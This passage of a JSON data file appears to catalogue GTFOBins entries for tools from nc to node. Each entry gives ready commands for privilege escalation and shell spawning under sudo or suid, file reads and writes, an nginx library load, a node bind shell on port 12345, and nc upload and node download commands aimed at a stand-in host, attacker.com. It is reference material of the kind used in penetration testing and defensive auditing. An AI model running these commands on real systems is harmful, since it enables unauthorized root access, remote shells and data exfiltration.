installation","aliases":[]},{"id":"gtfo:nc:upload:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:sudo","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:suid","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:unprivileged","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:sudo","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:suid","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:unprivileged","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:needrestart:inherit:0:sudo","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/needrestart/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:needrestart:inherit:0:unprivileged","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/needrestart/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:file-read:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:file-read:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:shell:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:shell:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nft:file-read:0:sudo","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nft/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nft:file-read:0:unprivileged","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nft/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:download:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:suid","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:unprivileged","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:upload:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:sudo","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:suid","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:unprivileged","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:sudo","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:suid","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:unprivileged","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:sudo","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:suid","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:unprivileged","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:sudo","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:suid","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 